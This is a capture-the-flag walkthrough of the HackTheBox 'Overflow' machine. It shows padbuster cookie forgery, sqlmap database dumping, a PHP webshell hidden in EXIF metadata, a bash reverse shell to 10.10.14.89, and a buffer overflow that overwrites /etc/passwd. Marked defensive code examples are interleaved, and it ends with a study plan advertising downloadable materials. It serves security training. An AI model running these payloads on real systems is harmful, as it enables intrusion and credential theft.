HackTheBox: Overflow target machine

Foreword

This is a hard-rated target machine. It mainly exercises web vulnerability exploitation, reverse engineering, persistence and privilege escalation. It is well suited as an introduction to reverse engineering and does a lot to develop a penetration-testing mindset; I learned a great deal from it.

Approach

Information gathering

The target machine exposes ssh, web and smtp services.

The web page has a registration form. After registering and logging in, I did not find any useful information.

Directory fuzzing found a logs.php file, but it reports that the session is not authenticated.

With no other leads, I intercepted the request and tampered with the cookie value; the response redirected to a new path, ../logout.php?err=1

Landing on this page suggested that a padding oracle attack might be possible.

Exploitation

Padding oracle attack with padbuster

Use padbuster to run a padding oracle attack against the auth cookie and decrypt it.

padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0

Use padbuster again to encrypt a chosen plaintext and obtain a cookie value for the Admin account.

padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0 -plaintext="user=Admin"

Replace the ordinary account's cookie with this value and refresh the page: an Admin Panel page appears.
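The attack above works because the auth cookie is a block-encrypted value with no integrity check, so the server's padding error becomes an oracle and any plaintext can be forged. The following Python is an added example, not code from the write-up or from the target's CMS: it issues and verifies a cookie that carries an HMAC-SHA256 tag over its payload, with every failure path returning the same result so the client learns nothing from a rejected cookie. The secret key and the user names are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed server-side secret for this example; a real deployment loads it
# from configuration and never hard-codes it.
SECRET_KEY = b"example-only-secret-key-change-me"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_cookie(user: str, key: bytes = SECRET_KEY) -> str:
    """Return 'payload.tag' where tag = HMAC-SHA256(key, payload).

    The payload is not secret here (it is only base64), but it cannot be
    changed without the key, which is what the padbuster-forged cookie lacked.
    """
    payload = _b64(json.dumps({"user": user}).encode())
    tag = hmac.new(key, payload.encode(), hashlib.sha256).digest()
    return f"{payload}.{_b64(tag)}"


def verify_cookie(cookie: str, key: bytes = SECRET_KEY) -> Optional[str]:
    """Return the user name if the cookie is authentic, otherwise None.

    Malformed encoding, a bad tag and a bad payload all return the same
    value, so there is no distinguishable error for a client to probe.
    """
    try:
        payload, tag = cookie.split(".", 1)
        expected = hmac.new(key, payload.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(tag)):  # constant-time compare
            return None
        return json.loads(_unb64(payload))["user"]
    except (ValueError, KeyError, TypeError):
        return None


def forge_attempt(cookie: str, new_user: str) -> str:
    """Swap the payload but keep the old tag, as someone who can edit the
    cookie but cannot compute the HMAC would have to."""
    _, tag = cookie.split(".", 1)
    return f"{_b64(json.dumps({'user': new_user}).encode())}.{tag}"
```

Changing the payload to `user=Admin` without the key produces a cookie that `verify_cookie` rejects, and the same `None` comes back for a truncated cookie, a wrong key or garbage, which is the property the padding oracle exploited the absence of.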

It turned out to be the CMS Made Simple framework. I found many nDays on EDB, but they all require authentication.

SQL injection

Having got nowhere with those, I opened the Logs page and viewed its source, which revealed a new file, ../config/admin_last_login.js

Accessing this js file revealed a new URL, http://overflow.htb/home/logs.php?name=admin

Directory scanning found the version file, which gives the CMS version as 2.2.8. Searching EDB showed a SQL injection vulnerability for this version.

Running sqlmap directly shows a GET-type injection.

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA"

Enumerate the databases.

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" --dbs

Enumerate the cmsmsdb database and find the cms_users and cms_siteprefs tables.

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" -D cmsmsdb

Dumping the columns of the cms_users table gives the password hashes of the admin and editor accounts.

Next the salt is needed. It lives in the cms_siteprefs table, and the value 6c2d17f37e226486 is obtained.

With the salt in hand, update the corresponding field in the exploit script taken from EDB earlier.

Cracking the admin hash failed, but the plaintext password of the editor account was recovered.
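To show why logs.php?name= was injectable and what the fix looks like, here is an added Python example (not the CMS's code and not the exploit used above): an in-memory SQLite stand-in for the tables enumerated, a query that concatenates the name parameter the way the vulnerable endpoint did, the parameterised equivalent, and a coarse log-review check that flags the kind of value sqlmap sends. Table column names, the placeholder hashes and salt, and the payload string are all constructed for the example, not the target's data.

```python
import re
import sqlite3
from typing import List, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the enumerated database; columns and values are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cms_users(username TEXT, password TEXT);
        CREATE TABLE cms_siteprefs(pref_name TEXT, pref_value TEXT);
        CREATE TABLE logs(name TEXT, entry TEXT);
        INSERT INTO cms_users VALUES ('admin',  'HASH-PLACEHOLDER-ADMIN');
        INSERT INTO cms_users VALUES ('editor', 'HASH-PLACEHOLDER-EDITOR');
        INSERT INTO cms_siteprefs VALUES ('password_salt', 'SALT-PLACEHOLDER');
        INSERT INTO logs VALUES ('admin',  'admin logged in');
        INSERT INTO logs VALUES ('editor', 'editor logged in');
    """)
    return conn


def logs_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # The request parameter is spliced into the SQL text, so a quote in it
    # ends the literal and the rest is parsed as SQL. This is the defect class
    # sqlmap reported for the logs page.
    sql = f"SELECT name, entry FROM logs WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def logs_safe(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    # The value is bound by the driver and only ever compared as data.
    return conn.execute("SELECT name, entry FROM logs WHERE name = ?", (name,)).fetchall()


# Constructed union payload: through the logs query it reads the users table.
UNION_PAYLOAD = "x' UNION SELECT username, password FROM cms_users -- "

# Patterns that rarely appear in a legitimate "name" parameter; tune before alerting.
_SQLI_PATTERNS = re.compile(
    r"(union\s+select|'\s*(or|and)\s+[\w']+\s*=|sleep\s*\(|benchmark\s*\(|;\s*--|--\s*$)",
    re.IGNORECASE,
)


def looks_like_sqli(param_value: str) -> bool:
    """Coarse detection heuristic for reviewing query-string values in access logs."""
    return bool(_SQLI_PATTERNS.search(param_value))
```

Against `logs_vulnerable` the payload returns the rows of `cms_users` instead of log entries; against `logs_safe` the same string is just a name that matches nothing. The hash and salt sitting in two tables of the same database is also why one injection point was enough to attempt offline cracking, so the parameterised query and a slow, per-user salted password hash are the two fixes that matter here.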

File upload vulnerability

I logged in to the CMS with the editor account but found nothing usable. By chance I found a subdomain, frvbuild-job.overflow.htb

After adding it to the hosts file and browsing to it, I found another login form; the editor account logs in successfully.

There is an upload point in the user profile settings. Trying to upload a PHP webshell shows that it is filtered.

Uploading a normal picture shows output in exiftool's format.

Try generating an image carrying a webshell in its metadata and using it.

exiftool -DocumentName="<h1>test<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd=(\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';}__halt_compiler();?></h1>" webshell.jpg

But the image was renamed after upload, so the payload could not be reached.

Finally, an exploit for the exiftool vulnerability turned up on EDB, and the same exploit is also available in MSF.

Note that on the latest Kali the payload has to be replaced with cmd/unix/reverse_netcat, otherwise the shell is not received.
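Both upload problems above come from trusting image metadata: the PHP text was planted in an EXIF tag, and the server then ran exiftool over every upload. As an added example (not code from the write-up or from the target's application), the following Python copies a JPEG while dropping its APP1..APP15 and COM segments, which is where EXIF, XMP, IPTC and free-text comments live, without handing the file to any metadata-aware library. The sample JPEG-shaped byte string is constructed inline for the test and is not a decodable picture.

```python
EOI, SOS, APP0, COM = 0xD9, 0xDA, 0xE0, 0xFE


def _segment(marker: int, body: bytes) -> bytes:
    """Build one length-prefixed JPEG segment (the length counts its own two bytes)."""
    return b"\xff" + bytes([marker]) + (len(body) + 2).to_bytes(2, "big") + body


def strip_jpeg_metadata(data: bytes) -> bytes:
    """Return a copy of a JPEG without APP1..APP15 and COM segments.

    APP0 (JFIF) and the tables needed to decode the image (DQT, DHT, SOF) are
    kept; from the SOS marker onward the entropy-coded data is copied verbatim.
    Raises ValueError on anything that is not a well-formed JPEG prefix, which
    an upload handler should treat as a rejected file.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    out = bytearray(b"\xff\xd8")
    i = 2
    while i + 2 <= len(data):
        if data[i] != 0xFF:
            raise ValueError(f"marker expected at offset {i}")
        marker = data[i + 1]
        if marker == SOS:          # image data follows until EOI; keep it as-is
            out += data[i:]
            return bytes(out)
        if marker == EOI:
            out += data[i:i + 2]
            return bytes(out)
        if i + 4 > len(data):
            break
        length = int.from_bytes(data[i + 2:i + 4], "big")
        end = i + 2 + length
        if length < 2 or end > len(data):
            raise ValueError(f"bad segment length at offset {i}")
        if not (0xE1 <= marker <= 0xEF or marker == COM):   # drop APP1..APP15 and COM
            out += data[i:end]
        i = end
    raise ValueError("truncated JPEG: no SOS or EOI found")


def build_sample_jpeg(payload: bytes) -> bytes:
    """Constructed minimal JPEG-shaped bytes: JFIF header, an APP1 carrying the
    payload (where an EXIF tag such as DocumentName would be), a COM segment,
    a placeholder quantisation table, a SOS header and a few data bytes."""
    jfif = _segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    exif = _segment(0xE1, b"Exif\x00\x00" + payload)
    comment = _segment(COM, b"created with exiftool")
    dqt = _segment(0xDB, b"\x00" + bytes(64))
    sos = _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    return b"\xff\xd8" + jfif + exif + comment + dqt + sos + b"\x12\x34\x56" + b"\xff\xd9"
```

Stripping has to happen on a parser that does not itself interpret the metadata, otherwise the stripping step is exposed to the same parser bug the MSF module exploits; re-encoding the image through an image library is the more thorough alternative, and the random rename the application already does is what stopped the planted PHP from being reached.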

Privilege escalation

www-data to tester

I uploaded the linpeas.sh script and found a database password.

Checking /etc/passwd shows developer and tester accounts; the developer account logs in successfully with this password.

A script, commontask.sh, was found in /opt; it references a domain that does not resolve, taskmanage.overflow.htb. Point the domain at our own machine's IP in the hosts file so that the script fetches and runs our task.sh instead. The content of task.sh is as follows.

bash -i >& /dev/tcp/10.10.14.89/4444 0>&1

Start a local http server, and the shell of the tester account comes back.
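The weakness here is a scheduled task that downloads a script by host name and executes whatever comes back, with name resolution controllable from a writable hosts file. As an added example (not code from the write-up or the target), the following Python shows the two checks such a task should make before piping anything to bash: whether the host name is being overridden in /etc/hosts, and whether the downloaded bytes match a digest pinned on the host at deployment time. The expected task body, its pinned digest and the hosts-file text are constructed for the example.

```python
import hashlib
import hmac
from typing import Optional

# Constructed: the script the maintainer intends the job to run, and the digest
# they pinned on the host when it was deployed. The digest lives locally; it is
# never fetched from the same place as the script.
EXPECTED_TASK = b"#!/bin/bash\n# routine maintenance\n/usr/bin/true\n"
PINNED_SHA256 = hashlib.sha256(EXPECTED_TASK).hexdigest()


def hosts_override(hosts_text: str, hostname: str) -> Optional[str]:
    """Return the address /etc/hosts maps hostname to, or None if it is not listed.

    A name the job fetches from should resolve through DNS; a hosts entry for
    it, especially one an unprivileged user could add, is what redirected
    commontask.sh to the attacker's web server above.
    """
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        address, *names = line.split()
        if hostname in names:
            return address
    return None


def verify_fetched_script(content: bytes, pinned_sha256: str) -> bool:
    """True only if the downloaded bytes hash to the digest pinned on the host."""
    digest = hashlib.sha256(content).hexdigest()
    return hmac.compare_digest(digest, pinned_sha256)


def decide(content: bytes, hosts_text: str, hostname: str,
           pinned_sha256: str = PINNED_SHA256) -> str:
    """Policy to apply before executing a fetched task; returns 'run' or a reject reason."""
    if hosts_override(hosts_text, hostname) is not None:
        return "reject: hostname is overridden in /etc/hosts"
    if not verify_fetched_script(content, pinned_sha256):
        return "reject: digest mismatch"
    return "run"
```

With the pinned digest in place the substituted task.sh is refused even if the redirect succeeds; the hosts-file check catches the redirect itself, and the same parser is a cheap thing to run from a host-monitoring job that alerts when a hosts entry appears for a name the system's cron jobs depend on.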

tester to root

Because the shell obtained this way is unstable, access as the tester user needs to be made persistent.

We could upload linpeas.sh again for enumeration, but here we manually found a binary, file_encrypt, in the /opt/file_encrypt directory. This file has root permissions.

Reverse Engineering

Reverse-engineer this program and locate the check_pin function. The C pseudocode is as follows.

void check_pin(void)
{
    undefined local_2c[20];   /* name buffer, 20 bytes */
    int local_18;             /* the pin the user types */
    long local_14;            /* the pin the program expects */
    int local_10;             /* the "code" shown to the user */

    local_10 = rand();
    local_14 = random();
    printf("This is the code: %i, Enter the Pin: ", local_10);
    __isoc99_scanf(&DAT_00010d1d, &local_18);
    if (local_14 == local_18)
    {
        printf("name: ");
        __isoc99_scanf(&DAT_00010c63, &local_2c);
        puts("Thanks for checking.You can give you feedback for improves");
    } else {
        puts("Wrong Pin");
    }
    return;
}

The logic is straightforward: the value we enter is stored in local_18 and compared with local_14, whose value is produced by the random function. Locating the random function gives the following C pseudocode.

long random(void)
{
    uint in_stack_00000004;   /* first stack argument; the decompiler shows random(void) but the value is read */
    uint local_c;
    int local_8;

    local_c = 0x6b8b4567;
    for (local_8 = 0; local_8 < 10; local_8 = local_8 + 1)
    {
        local_c = local_c * 0x59 + 0x14;   /* unsigned 32-bit arithmetic, wraps */
    }
    return local_c ^ in_stack_00000004;
}

Viewing the program in gdb shows that it ends with an XOR and that the state starts from the value 0x6b8b4567.

Having understood the program, we can write an exploit script. Running the following script gives the PIN value -202976456.

#!/usr/bin/python3
import ctypes

# Initial LCG state from the disassembly; the same value is XORed in at the end
local_c_initial = 0x6b8b4567
local_c = 0x6b8b4567
local_8 = 0
while (local_8 < 10):
    local_c = local_c * 0x59 + 0x14
    local_8 = local_8 + 1

# ctypes.c_int truncates to 32 bits and gives the signed value the binary compares against
PIN = ctypes.c_int(local_c ^ local_c_initial).value
print("The PIN code is: ", PIN)
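The script above gets the right answer because Python's big integers are truncated at the very end, and because the "code" the binary prints is always 0x6b8b4567: that is the first value glibc's rand() returns when srand() was never called. The following added example (mine, not the write-up's script) makes both points explicit: it emulates random() with 32-bit wrap on every step, takes the printed code as input rather than hard-coding it, and reproduces the check_pin comparison so the whole check can be tested. It assumes, as the write-up's script does, that the stack argument XORed inside random() is the code the program printed.

```python
import ctypes

MASK32 = 0xFFFFFFFF
# glibc rand() returns this first when the process never called srand(), so the
# unseeded binary always prints it as "the code" (constant seen in the disassembly).
FIRST_RAND = 0x6B8B4567


def random_emulated(arg: int) -> int:
    """Emulate the binary's random(): ten LCG steps on a uint32, then XOR with the argument."""
    local_c = 0x6B8B4567
    for _ in range(10):
        local_c = (local_c * 0x59 + 0x14) & MASK32   # uint arithmetic wraps at 32 bits
    return local_c ^ (arg & MASK32)


def pin_for_code(code: int) -> int:
    """The value check_pin() expects, as the signed int that scanf stores in local_18.

    Assumption: the argument random() reads from the stack is the printed code.
    """
    return ctypes.c_int32(random_emulated(code)).value


def check_pin(code: int, pin: int) -> bool:
    """Emulate the comparison local_14 == local_18 in check_pin()."""
    return pin_for_code(code) == pin


if __name__ == "__main__":
    print("code", FIRST_RAND, "-> pin", pin_for_code(FIRST_RAND))
```

The state after ten steps is 0x986d965f regardless of input, so the only secret in the "pin" is the code the program just printed; a fixed LCG with a public seed provides no protection, and a real check would compare against a value the caller cannot derive from what it is shown.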

Buffer overflow vulnerability

Enter a large number of characters to check for possible buffer overflow.

Use msf-pattern_offset to identify an overflow offset at 44.

Then 44 bytes of padding followed by the target address overwrite the EIP register and complete the overflow.

python3 -c "print('\x41'*44 + '\x5b\x58\x55\x56')"

Then a new idea emerged: copy the passwd file, and use this vulnerability to write the new account's fields into the original passwd file.

#!/usr/bin/python3

# XOR every byte of the prepared passwd copy with 0x9b and write the result to /tmp/passwd2
source = open('/tmp/passwd', 'rb').read()
dest = open('/tmp/passwd2', 'wb')

for i in source:
    dest.write(bytes([i ^ 0x9b]))

dest.close()
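
The single-byte XOR above is the whole "encryption" the file_encrypt binary applies, which is why a pre-XORed input comes out as plaintext. As an added example (not code from the write-up), the following Python shows how little that transform protects: the key is recovered from one known plaintext byte, or with no known plaintext at all by scoring all 256 candidates. The passwd-style sample is constructed for the example.

```python
# Constructed sample in passwd format; real files are longer but have the same shape.
SAMPLE_PLAINTEXT = (b"root:x:0:0:root:/root:/bin/bash\n"
                    b"tester:x:1001:1001::/home/tester:/bin/bash\n")
KEY = 0x9B   # the byte the walkthrough's script XORs with


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key is the identity."""
    return bytes(b ^ key for b in data)


def recover_key_known_plaintext(ciphertext: bytes, known_prefix: bytes) -> int:
    """With any known plaintext (passwd always starts with 'root:') the key is one XOR away."""
    if not known_prefix or len(ciphertext) < len(known_prefix):
        raise ValueError("need a known prefix no longer than the ciphertext")
    key = ciphertext[0] ^ known_prefix[0]
    if any(c ^ p != key for c, p in zip(ciphertext, known_prefix)):
        raise ValueError("ciphertext is not a single-byte XOR of the known prefix")
    return key


# Bytes expected in a passwd file; used only as a scoring alphabet.
_PASSWD_ALPHABET = frozenset(b"abcdefghijklmnopqrstuvwxyz0123456789:/\n")


def recover_key_blind(ciphertext: bytes) -> int:
    """No known plaintext: try all 256 keys and keep the one whose output looks most like passwd text."""
    def score(key: int) -> int:
        return sum(b in _PASSWD_ALPHABET for b in xor_bytes(ciphertext, key))
    return max(range(256), key=score)
```

A 256-candidate key space and a key that leaks through any known byte are the two properties that separate an obfuscation like this from a cipher; the same two checks, applied to an "encrypted" artefact found on a host, tell an analyst quickly whether its contents are actually protected.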

Next, a study plan for beginners.

Study plan

So the question comes up again: as a newbie, what should I learn first and what next?
Since you asked so directly, here is how to start learning from scratch:

Phase 1: Junior Network Security Engineer

Next is a one-month basic network security plan. After finishing it you can basically take a network security job, such as penetration testing, web penetration, security services or security analysis; if you learn the MLPS module well, you can also work as an MLPS engineer.

Comprehensive salary range 6k~15k

1. Network security theoretical knowledge (2 days)
① Understand the relevant background and prospects of the industry and determine the development direction.
②Learn laws and regulations related to network security.
③The concept of network security operations.
④Introduction to MLPS, regulations, processes and specifications for MLPS. (Very important)

2. Penetration testing basics (1 week)
①Penetration testing process, classification and standards
②Information collection technology: active/passive information collection, Nmap tool, Google Hacking
③Vulnerability scanning, vulnerability exploitation, principles, utilization methods, tools (MSF), bypassing IDS and anti-virus reconnaissance
④Host attack and defense drills: MS17-010, MS08-067, MS10-046, MS12-20, etc.

3. Operating system basics (1 week)
①Common functions and commands of Windows system
②Common functions and commands of Kali Linux system
③Operating system security (system intrusion investigation/system reinforcement basis)

4. Computer network basics (1 week)
①Computer network basics, protocols and architecture
②Network communication principles, OSI model, data forwarding process
③Common protocol analysis (HTTP, TCP/IP, ARP, etc.)
④Network attack technology and network security defense technology
⑤Web vulnerability principles and defense: active/passive attacks, DDOS attacks, CVE vulnerability recurrence

5. Basic database operations (2 days)
①Database basics
②SQL language basics
③Database security reinforcement

6. Web penetration (1 week)
①Introduction to HTML, CSS and JavaScript
②OWASP Top10
③Web vulnerability scanning tool
④Web penetration tools: Nmap, BurpSuite, SQLMap, others (Chopper, Miss Scan, etc.)

So far this has taken about a month, and you have successfully become a "script kiddie". Do you still want to continue?

Stage 2: Intermediate or senior network security engineer (depending on your ability)

Comprehensive salary range 15k~30k

7. Script programming learning (4 weeks)
Programming ability is the essential difference between a "script kiddie" and a true network security engineer. In real penetration testing, in complex and changing network environments, the usual tools often cannot meet the need, and existing tools must be extended or new tools and automation scripts written; that requires programming skill. In CTF competitions, where every second counts, using home-made script tools effectively requires it too.

For students who are starting from scratch, I suggest you choose one of the scripting languages Python/PHP/Go/Java and learn to program common libraries.
Set up a development environment and choose an IDE. Wamp and XAMPP are recommended for PHP environments, and Sublime is highly recommended for IDEs;

Learn Python programming. The learning content includes: syntax, regular expressions, files, networking, multi-threading and other common libraries. We recommend "Python Core Programming"; there is no need to read all of it.

Use Python to write exploits for vulnerabilities, and then write a simple web crawler

Learn basic PHP syntax and write a simple blog system

Be familiar with the MVC architecture and try to learn a PHP framework or Python framework (optional)

Understand Bootstrap layout or CSS.

Phase 3: Top Network Security Engineer

If you are interested in getting started with network security, a full set of entry-level and advanced learning resources (282G) is shared for free.

Sharing learning materials

Of course, giving a plan without materials would be a cop-out. Here is a 282G learning material package for network security engineers from entry level to proficiency; it can be obtained through the two QR code links below.